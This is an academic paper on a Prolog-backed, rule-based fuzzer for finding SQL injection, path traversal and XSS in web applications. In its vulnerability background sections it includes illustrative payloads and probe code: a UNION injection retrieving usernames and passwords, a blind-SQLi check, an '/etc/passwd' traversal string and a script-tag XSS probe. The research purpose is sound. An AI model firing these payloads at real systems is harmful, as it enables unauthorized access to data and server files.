1 Introduction

Web applications are the cornerstone of modern digital interactions, facilitating e-commerce, social networking, and information sharing. However, their widespread use also makes them prime targets for malicious actors seeking to exploit vulnerabilities. The rapid evolution of web technologies and the proliferation of complex web applications have rendered the task of securing them increasingly challenging. One potent weapon in the arsenal of cybersecurity professionals is fuzz testing, commonly known as fuzzing. Fuzzing involves the automated injection of various inputs, often malformed or unexpected, into a target system to uncover vulnerabilities. While fuzzing has proven remarkably effective in identifying security weaknesses, its application to web environments presents unique challenges that have been underrepresented in the existing literature.

This article aims to bridge this gap by presenting a comprehensive exploration of fuzzing techniques tailored explicitly to web applications. We delve into the intricacies of web-centric fuzzing, highlighting the idiosyncrasies that set it apart from traditional fuzzing approaches. Our research investigates the complexities of web technologies, including input validation, session management, and client-side interactions, shedding light on the specific challenges faced by security practitioners in this domain.

Furthermore, we introduce a modular architecture for fuzzing that not only enhances vulnerability discovery but also replicates the decision-making processes of security experts. This architecture allows for the customization of fuzzing strategies, enabling users to select and deploy specific modules according to their testing objectives. A Man In The Middle Proxy module stores the interactions performed while analyzing the target application. A Repeater module converts the collected interactions into template-based requests that can be used to initiate a fuzzing session. At the end of the fuzzing session, an Analyzer module converts the fuzzing results into a formal representation of the conditions a security expert would observe, which is then used to verify the presence of a vulnerability. We formalize these conditions by introducing the “analyzer observations” concept and show that it is possible to incorporate them into a knowledge base developed using logic programming. To this purpose, we leverage the declarative semantics of Prolog to implement a vulnerability knowledge base that maps the analyzer observations onto input-handling vulnerabilities.

We demonstrate that our proposed architecture facilitates the reuse of certain fuzzing steps, significantly streamlining the security testing process. By reducing redundancy, our approach conserves computational resources and accelerates the identification of vulnerabilities.

To foster collaboration and innovation within the security community, we provide an open-source implementation of our software (Footnote 1). This open approach encourages researchers to explore new techniques by modifying individual modules, ultimately promoting advancements in web application security.

In conclusion, our work addresses the unique challenges of web-centric fuzzing, introduces an adaptable modular architecture, showcases the reusability of specific fuzzing steps, and offers an open-source software package. Through these contributions, we aim to enhance the security of web applications, empower researchers to innovate in the field of fuzz testing, and fortify the cybersecurity landscape as a whole.

The remainder of this paper is organized as follows. Section 2 introduces the security testing process and describes the input-handling vulnerabilities analyzed in this work. To understand the inner details of the proposed solution, Sect. 3 provides an introduction to Prolog and logic programming. Section 4 analyzes the state of the art with respect to fuzzing. In Sect. 5, we show the design and implementation of our rule-based fuzzer by delving into the details of its main building modules. The proposed approach is evaluated in Sect. 6 by means of a comparative analysis with the renowned Zed Attack Proxy open-source web application scanner. In Sect. 7, we discuss a few interesting optimization strategies aimed at enhancing the performance of our fuzzer. Section 8 summarizes the obtained results and gives an insight into the prospective evolution of the proposed work.

2 Vulnerabilities in web applications

There is some debate in the literature about the “boundaries” between web security testing and web application penetration testing. Some authors define security testing as the application of automated approaches to discover vulnerabilities, as opposed to manual methods referred to as penetration tests [1]. A recent study [2] provides a systematic mapping of security testing approaches in the literature by extending the scope to penetration testing methodologies, such as OWASP [3]. According to the semantics proposed by the study, even security testing processes can use automatic, manual, and semi-automatic techniques.

In the business world, the distinction between security testing and penetration testing lies in their respective execution stages. Security testing is employed throughout various phases of the development process, ensuring that security measures are incorporated from the early stages. On the other hand, penetration testing is specifically conducted in the production phase, allowing for testing in a real environment with real-world configurations. Throughout the rest of this paper, we will use the term Web Application Penetration Testing (WAPT) to refer to an “opaque-box semi-automatic security testing methodology”. This approach combines both automated and manual techniques to comprehensively identify vulnerabilities in web applications.

In this section, we describe a Web application penetration testing process by also briefly illustrating three input-handling vulnerabilities studied in this work, namely, SQL injection, path traversal, and cross-site scripting.

2.1 Web application penetration testing process

Web Application Penetration Testing (WAPT) is an “opaque-box” process that enables companies to discover vulnerabilities in web applications by simulating hacker activities. Here, the “opaque-box” refers to the tester having very little prior knowledge about the target system. The process is composed of two main phases, as described in the following:

  1. The penetration tester attempts to create a “footprint” of the web application. This includes:

    • Gathering its visible content by exploring public resources as well as discovering information that seems to be hidden.

    • Analyzing the application and identifying its core functions, especially those for which the web application was designed. The purpose is to have a map of all the possible Data Entry Points that the application exposes, which are the main potential flaws that a hacker recognizes in the target application.

  2. In the second phase, the penetration tester knows which path to take and whether to focus on the way the application handles inputs or on probable flaws in its inner logic. To gain a comprehensive understanding of all possible application “holes”, it is, however, important to explore each of the following areas:

    • Focusing on the application logic means studying the client-side controls to find a way to bypass them.

    • The stage that involves analyzing how the application handles access to private functionality might be the one to focus on immediately because authentication and session management techniques usually suffer from a number of design and implementation flaws.

    • Input-handling attack techniques are by far the most widely deployed, since important categories of vulnerabilities are triggered by unexpected user input. The application can be probed by fuzzing the parameters passed in a request. See the next section for insights on this topic.

    • The website can represent an entry point that allows the attacker to have a complete understanding of the target network infrastructure. Defects and oversights within an application’s architecture can often enable the tester to escalate an attack, moving from one component to another to eventually compromise the entire application.

2.2 SQL injection

An SQL injection (SQLi) vulnerability allows a malicious user to manipulate the queries issued by a web application to a back-end database. Exploiting the vulnerability exposes sensitive data that cannot be retrieved when the application is used in an ordinary way. In many cases, a malicious user can modify or delete data, thus causing permanent changes to the application and altering its behavior. In some extreme situations, an attacker can also escalate privileges and compromise the underlying server or other back-end infrastructures.

2.3 Union attack

When SQL query results are returned as part of application responses, a malicious user can retrieve data from database tables. This technique makes use of the UNION operator, which combines the result sets of two SELECT statements, provided they return the same number of columns with compatible types. An attacker uses it to append an additional SELECT statement whose results expose data the application would not legitimately return.
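For illustration, the following sketch shows how unsafe query construction enables a UNION attack; the endpoint, table, and column names are hypothetical and not drawn from any benchmark used in this work.

# Illustrative only: a query built via unsafe string concatenation.
# The table and column names are hypothetical.
user_input = "' UNION SELECT username, password FROM users--"
query = ("SELECT name, description FROM products "
         f"WHERE name = '{user_input}'")
print(query)
# SELECT name, description FROM products WHERE name = ''
#   UNION SELECT username, password FROM users--'
# Both SELECT statements return two columns, so the UNION succeeds and
# the credentials are returned alongside the product data.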

2.4 Blind SQL

Blind SQL is a type of SQL injection attack that injects conditions evaluating to either true or false into the underlying query and verifies the presence of a vulnerability by observing differences in the application’s responses. The attack is typically used when the web application is vulnerable to SQL injection but only displays generic error messages, so that the vulnerability cannot be confirmed by simply observing the response content. Blind vulnerabilities can be used to access unauthorized data through challenging exploitation techniques.
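The following sketch illustrates a boolean-based blind probe of this kind; the target URL, parameter name, and payloads are illustrative assumptions, and the requests library is assumed to be available.

import requests

# Hypothetical endpoint and parameter, used purely for illustration.
base = "http://target.example/item.php"
resp_true = requests.get(base, params={"id": "1' AND '1'='1"})
resp_false = requests.get(base, params={"id": "1' AND '1'='2"})

# If a condition that is always true yields a different response than a
# condition that is always false, the parameter likely reaches a SQL query.
if resp_true.text != resp_false.text:
    print("Response differences suggest a blind SQL injection")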

2.5 Path traversal

Path Traversal (PT) is a web application vulnerability that allows attackers to access files and directories outside the web application’s root directory. The attack is performed by injecting payloads that reach files through directory traversal sequences built from special characters (e.g., “../”) or by injecting absolute file paths. By exploiting this vulnerability, it is possible to access arbitrary files and directories in the file system of the server, including application source code and critical system configuration files. This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing”, and “backtracking” [4].
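A minimal probe for this class of vulnerability might look as follows; the endpoint, parameter name, and marker string are illustrative assumptions.

import requests

# Hypothetical endpoint: a parameter that selects a file to display.
url = "http://target.example/view"
payload = "../../../../etc/passwd"
resp = requests.get(url, params={"file": payload})

# On Unix-like servers, the string "root:" in the response body is a
# strong indicator that /etc/passwd was disclosed.
if "root:" in resp.text:
    print("Possible path traversal vulnerability")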

2.6 Cross-site scripting

A Cross-site scripting (XSS) vulnerability may occur when a web application does not validate client-side code supplied in an attribute of an HTTP request. When the input is received and bounced back to the browser as part of the response, the client-side code is executed. Typically, attackers exploit such a vulnerability by sending a target user malicious URLs containing client-side code. Since the target user could already be authenticated in the vulnerable web application context, the injected malicious code might read their cookies, session token, or other sensitive information. Cross-site scripting vulnerabilities can be either reflected or stored. As already anticipated, with reflected cross-site scripting the web application bounces the injected payload back in the content of the HTTP response. The vulnerability is usually found in search pages, error messages, and wherever the web application needs to send back information obtained from the received request. With stored XSS, instead, the injected code is stored in the web application itself. When users visit a specific page of the vulnerable application, the maliciously stored content is retrieved and the code is executed, thus potentially impacting all the users of the application.
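A simple reflected-XSS probe along these lines is sketched below; it only checks whether the payload is bounced back verbatim, which, as discussed in Sect. 6.2, can produce false positives without rendering the page. The endpoint and parameter are hypothetical.

import requests

# Hypothetical search endpoint that echoes its query parameter.
url = "http://target.example/search"
payload = "<script>alert('xss-probe')</script>"
resp = requests.get(url, params={"q": payload})

# A verbatim reflection suggests missing output encoding; confirming actual
# execution would additionally require rendering the page in a browser.
if payload in resp.text:
    print("Payload reflected: candidate reflected XSS")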

3 Prolog and first-order logic programming

Our rule-based fuzzer discovers vulnerabilities by leveraging a vulnerability knowledge base written in Prolog. In this section, we give a high-level overview of logic programming, with particular reference to first-order logic. Logic programming was introduced in 1974 by Kowalski [5], who showed that first-order logic can serve as a useful and practical programming language with solid theoretical foundations. These foundations rest on the Horn clauses studied by the logician Alfred Horn (1951) [6]. Horn clauses are the basis of logic programming, as they enable the so-called linear resolution with selection function (SL-resolution) [7]. SL-resolution starts from the negation of a query and repeatedly resolves it against rules and facts until a contradiction is derived, thereby proving the query by refutation.

Prolog was designed as a programming language and has been extensively used in several research areas, such as molecular biology, the design of VLSI (Very Large Scale Integration) systems, legislation, and options trading [8]. It can be used in every domain that can be represented as facts and rules. The language allows us to build a logical representation of the context and to easily write a program able to solve a problem within it. Prolog differs from pure logic programming in several respects: it can be considered a specialization or refinement of programming in Horn clause logic in which the selection rule and the search strategy are fixed [9]. A quick introduction to the Prolog syntax can be found in Matuszek’s course [10].
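As a brief illustration of facts, rules, and queries, consider the following snippet, which drives SWI-Prolog from Python through the pyswip bindings; the family-relations example is our own illustrative choice, not taken from the cited course.

from pyswip import Prolog

prolog = Prolog()
# Facts: parent(Parent, Child).
prolog.assertz("parent(tom, bob)")
prolog.assertz("parent(bob, ann)")
# Rule: X is a grandparent of Z if X is a parent of Y and Y a parent of Z.
prolog.assertz("grandparent(X, Z) :- parent(X, Y), parent(Y, Z)")

# Query: who are Ann's grandparents?
for solution in prolog.query("grandparent(G, ann)"):
    print(solution["G"])  # -> tom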

3.1 Logic programming and security

Logic programming finds extensive utility within the security domain. Notably, in network security, logic programming serves as a valuable tool for evaluating the security level of communication protocols [11, 12]. Furthermore, Barker (2000) [13] adeptly employed logic programming in the formulation of Role-Based Access Control (RBAC) security models. Zech et al. (2013) [14] demonstrated the potential of logic programming in automating the risk analysis process, thereby enhancing penetration testing endeavors with critical risk insights. Moreover, within the realm of software testing, logic programming emerges as a prevalent approach for generating test cases, as evidenced by numerous studies [15,16,17].

In another paper published in 2019 [18], Zech et al. expand the realm of test-case generation into the domain of security. The authors showcase the adeptness of a knowledge-based system in uncovering vulnerabilities within web applications. Their approach involves the introduction of a security problem concept, which serves to model the System Under Test (SUT) using a Domain Specific Language. The concept of a security risk profile is then introduced to identify the most critical vulnerability to which the SUT is susceptible. To achieve this, they devise an expert system encompassing both the security risk model and a grammar-based test data generator. To substantiate their findings, the authors engineer a state machine that can effectively identify SQL injection (SQLi) and Cross-Site Scripting (XSS) vulnerabilities. Their innovative formulation of the SUT using Specification and Description Language (SDL) proves intriguing, displaying several points of intersection with our own work. Their framework establishes a correlation between the most salient vulnerability based on security risks and the attack payloads directed at the system. Our approach follows a similar strategy, albeit with notable distinctions. We employ a knowledge-based system to facilitate the oracle module within the fuzzing process. In contrast, the cited authors employ the knowledge base to map threats to the test-data generation procedure. Additionally, our approach takes a semi-automatic route to generate template-based HTTP requests for use in the fuzzing process. This varies from their approach of utilizing a web spider, which can be susceptible to issues like forbidden errors for authenticated pages and missing links generated dynamically before the HTML page rendering phase.

4 Fuzzing: state of the art

Fuzzing, also known as fuzz testing, is an automated software testing technique designed to uncover irregularities in a target application by feeding it with invalid, unexpected, or random input data. Throughout the execution of fuzzing, the target application is closely monitored to unveil software errors that might indicate the presence of a security vulnerability. Although the notion of employing random data to trigger anomalies may appear simplistic, it has yielded impressive outcomes by identifying errors in various software applications.

Over the past two decades, fuzzing has demonstrated its exceptional efficacy in unearthing vulnerabilities that often go unnoticed by static software analysis and manual code reviews. This technique has seamlessly integrated into software development practices and is now considered an indispensable component for assuring software security.

In the literature, fuzzing techniques are categorized into three distinct types: opaque-box, grey-box, and clear-box. The classification hinges on the extent of information available about the System Under Test (SUT) before the fuzzer’s execution.

Opaque-box fuzzing techniques operate without access to any internal information about the target system, such as its source code or system documentation. These methods solely rely on input and output data. Often referred to as data-driven or input/output-driven testing, this approach keeps the intricacies of the system hidden. The testing process revolves around observing the outcomes of the system and pinpointing deviations from specified behavior. Complex fuzzers employ generative or mutational input strategies for this purpose [19].

Clear-box fuzzing techniques, by contrast, let the tester tap into supplementary information such as source code or design specifications, offering insights into the system’s behavior. With this knowledge, it is feasible to enhance the coverage of the system during testing, thereby boosting its overall effectiveness.

A grey-box fuzzer occupies a middle ground, adopting a “lightweight” approach to gather insights about the System Under Test (SUT). It gathers data through statistical analysis, sourced either from a static evaluation of the system or from dynamic data extracted, for example, by a debugger (McNally et al. [20]). This information might not be exact, but it enables faster execution and exploration of input possibilities. Grey-box techniques initiate mutational input exploration with a seed input. When interesting paths are triggered, the mutated input is retained and further mutated to explore the remaining input space. The objective is to enhance behavioral coverage and unearth vulnerabilities in the system based on the information gleaned by the fuzzer [21].

Our work falls within the opaque-box fuzzing category: it emulates the actions of a security expert who manually sets up the fuzzing attack. This method becomes essential when access to the source code is unavailable. Adopting an opaque-box approach thus offers a viable chance of detecting vulnerabilities without any prior familiarity with the application under examination, which both enhances the efficiency of vulnerability detection and diminishes the time needed for a manual security assessment.

4.1 A generic fuzzing algorithm

Valentin J.M. Manès et al. (2019) [22] introduced a versatile fuzzing algorithm capable of accommodating the various types of fuzzing methods described above.

Algorithm 1: Generic Algorithm of a fuzzer

The algorithm accepts a set of fuzz configurations \(\mathbb {C}\) and a timeout parameter \(t_{limit}\) as input, producing a set of vulnerabilities \(\mathbb {B}\) as output. It is structured into two phases: a pre-processing phase, which is executed at the start of a fuzzing campaign, and a subsequent fuzzing process. Notably, some fuzzers may not implement all the functions within the fuzzing process.

The pre-processing step takes the set of configurations and produces a modified set of configurations tailored to the requirements of the specific fuzzing algorithm being used. During each iteration, the schedule function selects the configuration to use, considering both the elapsed time and the preconfigured time limit. This stage tackles a challenge known as Exploration vs Exploitation [23], which revolves around the allocation of computational resources: it entails finding the right equilibrium between exploring new configurations to maximize fuzzer performance and refining the existing configuration to approach the optimal solution.

Subsequently, the scheduling function endeavors to enhance system coverage and optimize performance, potentially altering the set of selected configurations. Following the scheduling phase, the next step is to determine the test input. The inputgen function defines, mutates, or generates a series of test cases to be executed against the program. The algorithm then assesses whether these executions result in security policy violations; vulnerability detection is achieved by consulting an oracle. Finally, the configuration parameters are adjusted based on the discovered vulnerabilities, using the information acquired during the current iteration, through the confUpdate function. The algorithm concludes once the time limit is reached.
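To make the control flow concrete, the following Python sketch mirrors the loop structure described above. Every phase function is a trivial stub standing in for a real implementation; the names (preprocess, schedule, inputgen, and so on) follow the terminology above rather than any actual fuzzer API.

import random
import time

# Trivial stubs standing in for the real phases of Algorithm 1.
def preprocess(confs):
    return confs

def schedule(confs, elapsed, t_limit):
    return confs[0]  # our fuzzer uses an identity-like schedule (see Sect. 5.1)

def inputgen(conf):
    return [random.randbytes(8) for _ in range(4)]  # placeholder test cases

def inputeval(conf, test_cases):
    return set(), []  # (discovered bugs, execution information); none here

def confupdate(confs, conf, exec_infos):
    return confs

def fuzz(configurations, t_limit):
    bugs = set()
    configurations = preprocess(configurations)   # pre-processing phase
    start = time.monotonic()
    while time.monotonic() - start < t_limit:     # fuzzing process
        conf = schedule(configurations, time.monotonic() - start, t_limit)
        test_cases = inputgen(conf)
        new_bugs, exec_infos = inputeval(conf, test_cases)  # oracle consulted here
        bugs |= new_bugs
        configurations = confupdate(configurations, conf, exec_infos)
    return bugs

print(fuzz([{"payloads": []}], t_limit=0.1))  # -> set()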

4.2 Related works and fuzzing problems

One of the challenges in fuzzing is selecting the configuration that best optimizes performance. Fuzzer designers must analyze the available information and make a choice that leads to an ideal outcome, such as discovering the maximum number of vulnerabilities in the shortest possible time. This challenge is often framed as the Exploration vs Exploitation problem, where the decision revolves around whether to explore new configurations or maximize the performance of a chosen configuration. Woo et al. (2013) [24] referred to this challenge as Fuzz Configuration Scheduling. Berry and Fristedt (1985) [25] delved into the problem of searching for the optimal configuration. They allocated a finite set of resources to various configurations and aimed to maximize the achievable gain. They found that a configuration minimizing the consumption of temporal resources tended to discover a greater number of vulnerabilities. Householder et al. (2012) [26] took advantage of information from a mutational black-box fuzzing execution to define an ideal configuration that maximized vulnerability discovery. They achieved this by modifying the CERT Basic Fuzzing Framework (BFF) algorithm, resulting in an 85% increase in crashes.

Table 1 Inspirational contributions from relevant works focused on software testing and their impact on the design of our solution

Discovering vulnerabilities in a web application requires a fuzzer to effectively differentiate between expected (normal) behavior and unexpected (buggy) behavior. However, distinguishing a bug from a feature can be challenging, leading to what is known as the Oracle Test Problem [27]. An oracle test is employed to determine whether a test is successful or not, involving a comparison of the system’s outputs, given a specific input, with the expected outputs during the application’s normal execution.

Although these prior studies were focused on defining fuzzing solutions for the software testing domain, they significantly influenced the design of our rule-based fuzzer. We incorporate an initial configuration exploration strategy and a detection approach that combines an Oracle test with an expert system. The Oracle test is designed to identify discrepancies between valid interactions with the application and those of an attacker. These differences serve as observations used to query a vulnerability knowledge base containing a set of rules derived from existing security expertise. This knowledge base is constructed by inferring an application’s behavior in the context of injection-type vulnerabilities. Table 1 summarizes the contributions of the related works mentioned above, which have significantly influenced the design of our solution.

Other works deepen the research of fuzzing solutions to discover vulnerabilities in web applications. Duchene et al. (2014) [28] used a black-box fuzzer to detect Cross-Site Scripting (XSS) vulnerabilities with the assistance of an Oracle test. Their approach utilized a genetic algorithm to generate fuzz inputs and then compared the Document Object Model (DOM) obtained after a cross-site scripting injection with established behavioral patterns. They represented the DOM injection as a taint tree. Similarly, Appelt et al. (2014) [29] adopted a comparable approach to identify SQL injection vulnerabilities. They employed a mutational approach that intercepted communications between the web application and the underlying database to uncover these vulnerabilities.

Khalid et al. (2018) [30] employed a predictive white-box fuzzer approach to detect vulnerabilities. In their work, the authors analyzed the input validation and sanitization processes within an application to predict the presence of vulnerabilities. This predictive method combines insights from both static and dynamic code analysis, enhancing the accuracy of vulnerability prediction.

Current research endeavors are focused on adapting artificial intelligence models to grey-box fuzzing for the detection of cross-site scripting vulnerabilities [31, 32]. However, these approaches are often tailored to specific programming languages and designed to identify a single type of vulnerability. Additionally, the grey-box approach can be challenging to implement, especially when the source code of the assessed application is not available.

When selecting a web application scanner, it is critical to thoroughly assess its features, since each scanner has its own characteristics and capabilities. Altulaihan et al. (2023) [33] have delved into this area, offering recommendations for the best scanners and proposing tool combinations to achieve optimal performance. We have drawn inspiration from their guidance in developing our fuzzer, which capitalizes on the knowledge provided by security experts to enhance its capabilities. As stated in Sect. 8, there is no formalized, comprehensive test suite that would enable an objective performance evaluation. Furthermore, the related works do not publicly provide their source code, making a comparison challenging. However, it is helpful to summarize the strengths and limitations of each approach compared to ours. Tables 2 and 3 show such a comparison. Related works typically integrate white-box or grey-box approaches with innovative algorithms or AI-based techniques to enhance the discovery of specific classes of vulnerabilities. However, they often struggle to cover a broad range of programming languages or vulnerabilities. In future work, we aspire to develop a formalized benchmark to replicate experiments and facilitate a quantitative comparison with related works.

Table 2 Benchmarks and performance metrics used in related works compared with our approach
Table 3 Qualitative comparison with related works focused on web applications

As evident from the tables, each work employs different benchmarks and performance metrics. Hence, in Sect. 6, we endeavor to compare our approach with a prominent open-source scanner. Moving forward, we plan to address this challenge by developing a comprehensive benchmark, thereby enhancing the evaluation process. Section 8 delves into this issue, offering suggestions to refine the proposed work.

In summary, our work employs an opaque-box, rule-based methodology to detect input-handling vulnerabilities. We have devised specific vulnerability rules targeting SQL injection, reflected XSS, and Path Traversal. The vulnerability discovery process entails validating the integrity of data retrieved from the application and subsequently consulting the expert system to identify any breaches of security policies.

5 A rule-based fuzzer to discover input handling vulnerabilities

The methodology described in Sect. 2 is designed to uncover vulnerabilities in various areas, including authentication, client-side functionality, and input handling. As demonstrated in [35], fuzzing can effectively identify input handling flaws in web applications. The process of discovering input-handling vulnerabilities involves a series of sequential steps. Initially, the tester identifies the entry points of the application. Then, they inject malicious payloads to provoke abnormal behaviors. Finally, they conduct further investigation to confirm the presence of a vulnerability. Fuzzing is a valuable technique for generating anomalies that can reveal the existence of flaws and vulnerabilities. However, selecting appropriate input for fuzzing is a complex task, as the input must be semantically correct to avoid rejection by the application. In the context of web applications, input primarily consists of HTTP requests. Nevertheless, a single web application can expose multiple input pages, and each HTML page may contain numerous parameters that can be subjected to fuzzing. Security testers often manually instrument the input by interacting with the tested web application and developing tools that replicate these interactions. In our platform, we have two modules that address this challenge.

The Interceptor Module is responsible for capturing and storing web interactions that occur during the initial interaction between the security tester and the target website. This functionality enables the system to gain insights into how to effectively engage with the target. Meanwhile, the Repeater Module replaces the values of request parameters with placeholders and generates a generic repeater file that can be employed in the fuzzing phase. In the realm of web application penetration testing, testers often lack comprehensive knowledge of the inner workings of the target system. Consequently, opaque-box fuzzing becomes the most suitable technique. Following the methodology for testing web applications, testers devise malicious payloads aimed at uncovering various types of vulnerabilities. For instance, when seeking to identify an SQL Injection vulnerability, testers create a list of payloads that have the potential to trigger SQL errors. They then initiate the fuzzing process using these payloads and examine the outcomes. If errors are encountered, anomalies are scrutinized to validate the presence of a vulnerability. This final step can be systematically modeled by employing a rule-based system that incorporates the criteria established by security experts to confirm the existence of vulnerabilities.

As previously mentioned, our primary focus revolves around three distinct types of injection vulnerabilities: Cross-Site Scripting, SQL Injection, and Path Traversal. Nevertheless, it is important to note that our designed solution boasts a high degree of customization and can be readily extended to detect other categories of vulnerabilities. The vulnerability discovery phase relies on expert knowledge that has been formally represented in the form of a knowledge base. This approach enhances the efficiency of detection. The knowledge base contains information concerning the correlations between anomalous responses from the target and potential vulnerabilities, as discerned by experienced security testers. Essentially, it operates on the same principles as an actual security expert who launches attacks against a target and assesses for vulnerabilities when anomalous behaviors stemming from errors manifest.

In the following sections, we will delve into the algorithm, the system architecture, and the interactions that transpire throughout the vulnerability discovery process.

Algorithm 2: Rule-Based Fuzzer Algorithm

5.1 Initialization and fuzz-run phases

The Rule-Based fuzzer algorithm takes a set of configuration files \(\mathbb {C}\) as input:

  • Proxy configuration: a configuration file containing the information needed to set up the MITM (Man In The Middle) proxy module, used to capture HTTP interactions between the user and the target web application;

  • Payload configuration: a configuration file containing information related to the attack strings used during fuzzing to trigger errors in the target web application. In our tests, we define SQLi, PT, and XSS payloads;

  • Observations configuration: a configuration file that specifies the types of observations to be processed by the vulnerability knowledge base. In subsequent sections, we will provide a detailed explanation of these observations when we describe the functionality of the analyzer module in our platform;

  • Relevant strings configuration: a configuration file containing keywords that will be searched for inside the content of an HTTP response. We will explain the role of relevant strings further in the paper.

When the algorithm execution is completed, the system outputs a set of vulnerabilities \(\mathbb {B}\).

The preprocess() function processes the information contained in the configuration files to define the execution environment. During this phase, the system is instrumented by configuring the proxy parameters, specifying the payloads, and defining relevant strings. The schedule() function defines the configuration to be used within the fuzz-run phase. In our approach, the mentioned schedule function does not make any optimal configuration choice in the configuration space. It rather uses the same configuration as the one defined in the preprocessing phase, essentially acting as an identity function.

The intrusion and vulnerability detection phases follow the configuration phase. The inputgen() function generates test cases using the previously defined payloads. In the context of web applications, these test cases are HTTP requests with malicious payloads inserted at specific points within the request. The intrusion phase occurs during the execution of the intruder() function, which processes the test cases and attacks the target application using a “Sniper attack”, as will be explained in more detail later in the paper. As a result of the intruder phase, an output file containing information about the results of the fuzzing attack is generated.

The detection phase involves evaluating the results to identify vulnerabilities using the analyzer() and eval() functions. The analyzer function compares the observations obtained from a valid HTTP interaction with those generated during the fuzzing of the web application. An oracle module then checks these observations based on its knowledge base. The Oracle test is a critical component in this phase as it verifies the existence of specific conditions that indicate the presence of a vulnerability. The oracle checks for vulnerabilities by querying a knowledge base containing a set of rules and assertions that formalize anomalous observations. The eval() function retrieves information from the Oracle tests and determines whether a security policy is being violated. A policy violation occurs when the system concludes that the observed anomalies are indeed indicative of a vulnerability.

Figure 1 presents a high-level overview of the Rule-Based Fuzzer. As shown, the system consists of several independent modules. This modular design enables security testers to execute each fuzzing phase individually. Additionally, we employed the system itself to refine the configuration files, following the process outlined in Algorithm 3. Another advantage of this modular approach is the ability to repeat experiments consistently.

For instance, it is possible to modify configuration files, optimize the payload set, enhance the knowledge base, and perform the fuzzing step without having to redo the previous ones.

Fig. 1: Rule-Based Fuzzer - High-Level Architecture

5.2 Proxy

The Proxy module intercepts and records HTTP interactions generated during the user’s navigation. This acquisition is accomplished using a man-in-the-middle proxy positioned between the client and the server. As illustrated in Fig. 2, we have implemented this proxy using Mitmproxy [36], an interactive proxy that supports SSL/TLS for HTTP/1, HTTP/2, and WebSocket. The module is configured as a transparent proxy (see Fig. 3), also known as an intercepting proxy, inline proxy, or forced proxy. In this mode, it intercepts communications at the network layer (layer 3 of the ISO/OSI stack) without requiring any client-side configuration [37]. This approach allows us to intercept HTTP session requests without modifying them. The creation of a custom module that incorporates transparent proxy functionality was necessary to select the injection points of interest in an HTTP request. Listing 1 presents a simple HTTP POST request, which serves as a typical example of input for one additional component of our architecture, namely the Repeater module.

Listing 1: A simple HTTP POST request
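As an illustration of how such interception can be scripted, the following hypothetical Mitmproxy addon records each request/response pair for later processing; the output file name and JSON fields are our own illustrative choices, not the actual format used by the Proxy module.

# Run with: mitmproxy --mode transparent -s recorder.py
import json

from mitmproxy import http

class Recorder:
    def __init__(self):
        self.interactions = []

    def response(self, flow: http.HTTPFlow) -> None:
        # Called once per completed HTTP interaction; store the pair.
        self.interactions.append({
            "method": flow.request.method,
            "url": flow.request.pretty_url,
            "headers": dict(flow.request.headers),
            "body": flow.request.get_text(),
            "status_code": flow.response.status_code,
            "response_body": flow.response.get_text(),
        })
        with open("interactions.json", "w") as f:
            json.dump(self.interactions, f, indent=2)

addons = [Recorder()]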

5.3 Repeater

Because the system operates as an opaque-box fuzzer, it cannot automatically deduce the schema of executed requests. The Repeater module enhances Mitmproxy’s capabilities by inspecting the sent HTTP requests and substituting placeholders for injection points. An injection point might be any pertinent attribute of an HTTP request, such as a parameter or a header value. The outcome of the Repeater module is a collection of HTTP requests with placeholders.

Definition 1

(Placeholder HTTP request) Let:

  • \(\mathbb{H}\mathbb{R}\) the set of HTTP requests intercepted by the MITM proxy component;

  • \(\mathbb{I}\mathbb{P}\) a set of injection points of \(hr \in \mathbb{H}\mathbb{R}\) defined in the Proxy configuration file;

  • placeholder symbol: a fixed-size string, e.g., $placeholder$.

A Placeholder HTTP Request is the output of a function that replaces all of the injection points with the placeholder symbol:

$$\begin{aligned} SetupPlaceholder(hr, \mathbb{I}\mathbb{P}), hr \in \mathbb{H}\mathbb{R} \end{aligned}$$
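A minimal sketch of the SetupPlaceholder function is given below, under the simplifying assumption that injection points are named query-string parameters; the actual module also handles body parameters and header values.

from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

PLACEHOLDER = "$placeholder$"

def setup_placeholder(url: str, injection_points: set) -> str:
    # Replace the value of every injection-point parameter with the
    # placeholder symbol, leaving the other parameters untouched.
    scheme, netloc, path, query, frag = urlsplit(url)
    params = [
        (k, PLACEHOLDER if k in injection_points else v)
        for k, v in parse_qsl(query)
    ]
    return urlunsplit((scheme, netloc, path, urlencode(params, safe="$"), frag))

# Example: mark the "q" parameter as an injection point.
print(setup_placeholder("http://target.example/search?q=test&page=1", {"q"}))
# -> http://target.example/search?q=$placeholder$&page=1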

As highlighted in Fig. 4, the Repeater module outputs a set of data in the following form:

  • idFuzz: session fuzzing identifier;

  • Request: a valid HTTP request;

  • Response: a valid HTTP response;

  • Placeholder HTTP request: a valid HTTP request containing placeholders at selected parameter places.

An example of how the HTTP request in Listing 1 might look after having been processed by the Repeater is reported in Listing 2.

Fig. 2: High-Level Architecture - Mitmproxy Interceptor

Fig. 3: Transparent Proxy

Listing 2: The HTTP request of Listing 1 after processing by the Repeater

The output of the repeater module will be used in the fuzzing phase.

Fig. 4: High-Level Architecture - Repeater

5.4 Intruder

Fig. 5: High-Level Architecture - Intruder

The Intruder module, whose high-level architecture is described in Fig. 5, performs a fuzzing attack against the target application using several attack payloads that specialize the placeholder HTTP requests generated by the Repeater module. The fuzzing session produces a set of HTTP interactions, together with additional information (see Listing 3):

  • idFuzz: session fuzzing identifier;

  • Request: the HTTP request used for fuzzing;

  • Response: the related HTTP response;

  • TypePayload: the type of payload used during the fuzzing session, e.g., SQLi, XSS, and PT;

  • Payload: the payload string used during the fuzzing session.

Listing 3: Fuzzing session output

The attack on the system is carried out using one or more payload lists that trigger the aforementioned vulnerabilities. Payloads were selected from several public lists, as well as by deeply investigating the behavior of several web application scanners. Collected payloads were fine-tuned during the vulnerability knowledge base generation process defined in Algorithm 3. We decided to retain:

  • 59 PT payloads;

  • 67 SQLi payloads;

  • 15 XSS payloads.

In Sect. 6, we show that the accuracy depends on both the type and the number of payloads used during the fuzzing process. In this work, we use an empirical approach to choose the payloads by simply collecting those that generate the most interesting analyzer observations. Payload set optimization is discussed in more detail in Sect. 7. To fuzz the application, the Sniper Attack is used.

Definition 2

(Sniper Attack) Let phr be a placeholder HTTP request composed of n injection points ip, and let \(\mathbb{F}\mathbb{S}\) be a set of m fuzzing strings defined in the payload configuration file.

For each ip, generate m requests by replacing the ip placeholder with all m fuzzing strings in \(\mathbb{F}\mathbb{S}\) while configuring the other injection points with valid values. The sniper attack is performed by sending to the target web application the \(n \times m \) HTTP requests obtained in such a way.

